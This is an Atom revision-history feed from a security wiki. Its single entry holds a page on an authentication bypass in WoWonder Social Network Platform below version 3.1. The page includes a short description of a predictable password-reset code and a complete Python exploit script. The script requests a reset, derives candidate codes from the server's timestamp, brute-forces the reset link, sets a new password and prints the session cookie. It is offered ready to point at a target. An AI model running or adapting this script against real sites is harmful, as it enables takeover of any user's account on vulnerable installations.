<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WoWonder_Social_Network_Platform_3.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E%2Fen</id>
	<title>WoWonder Social Network Platform 3.1 身份驗證繞過漏洞/en - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WoWonder_Social_Network_Platform_3.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E%2Fen"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WoWonder_Social_Network_Platform_3.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/en&amp;action=history"/>
	<updated>2026-04-05T07:52:41Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=WoWonder_Social_Network_Platform_3.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/en&amp;diff=4813&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==Affected Versions==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WoWonder_Social_Network_Platform_3.1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/en&amp;diff=4813&amp;oldid=prev"/>
		<updated>2021-06-12T01:31:32Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==Affected Versions==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Affected Versions==&lt;br /&gt;
Version: &amp;lt; 3.1&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass&lt;br /&gt;
# Date: 11.06.2021&lt;br /&gt;
# Exploit Author: securityforeveryone.com&lt;br /&gt;
# Researchers : Security For Everyone Team - https://securityforeveryone.com&lt;br /&gt;
# Vendor Homepage: https://www.wowonder.com/&lt;br /&gt;
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302&lt;br /&gt;
# Version: &amp;lt; 3.1&lt;br /&gt;
# Tested on: Linux/Windows&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
DESCRIPTION&lt;br /&gt;
&lt;br /&gt;
In WoWonder &amp;lt; 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day.&lt;br /&gt;
The vulnerability is found the &amp;quot;code&amp;quot; parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999.&lt;br /&gt;
if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application.&lt;br /&gt;
&lt;br /&gt;
ABOUT SECURITY FOR EVERYONE TEAM&lt;br /&gt;
&lt;br /&gt;
We are a team that has been working on cyber security in the industry for a long time.&lt;br /&gt;
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.&lt;br /&gt;
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import email.utils as eut&lt;br /&gt;
import calendar, time;&lt;br /&gt;
import hashlib, re;&lt;br /&gt;
&lt;br /&gt;
url = &amp;quot;http://wowonderlab:80/wowonder/&amp;quot; #change this with your target&lt;br /&gt;
myheaders = {&amp;quot;X-Requested-With&amp;quot;: &amp;quot;XMLHttpRequest&amp;quot;, &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;, &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;}&lt;br /&gt;
recoverdata = {&amp;quot;recoveremail&amp;quot;: &amp;quot;wowondertest@securityforeveryone.com&amp;quot;}  #change this email with your registered wowonder email address&lt;br /&gt;
req = requests.post(url+&amp;quot;requests.php?f=recover&amp;quot;, headers=myheaders, data=recoverdata)&lt;br /&gt;
b = eut.parsedate(req.headers[&amp;quot;Date&amp;quot;])&lt;br /&gt;
respepoch = calendar.timegm(time.strptime(&amp;quot;{0}-{1}-{2} {3}:{4}:{5}&amp;quot;.format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S'))&lt;br /&gt;
&lt;br /&gt;
for token in range(111,1000):&lt;br /&gt;
    str2hash = &amp;quot;{0}{1}&amp;quot;.format(token,respepoch)&lt;br /&gt;
    email_code = hashlib.md5(str2hash.encode()).hexdigest()&lt;br /&gt;
&lt;br /&gt;
    req_reset = requests.get(url+&amp;quot;index.php?link1=reset-password&amp;amp;code=1_{0}&amp;quot;.format(email_code))&lt;br /&gt;
    if len(re.findall(&amp;quot;New password&amp;quot;,req_reset.text)) == 1:&lt;br /&gt;
        print(email_code)&lt;br /&gt;
        resetdata = {&amp;quot;password&amp;quot;: &amp;quot;10711071&amp;quot;, &amp;quot;id&amp;quot;: &amp;quot;1_&amp;quot;+email_code}&lt;br /&gt;
        reqtoken = requests.post(url+&amp;quot;requests.php?f=reset_password&amp;quot;, headers=myheaders, data=resetdata)&lt;br /&gt;
        print(reqtoken.headers['Set-Cookie'])&lt;br /&gt;
        break&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>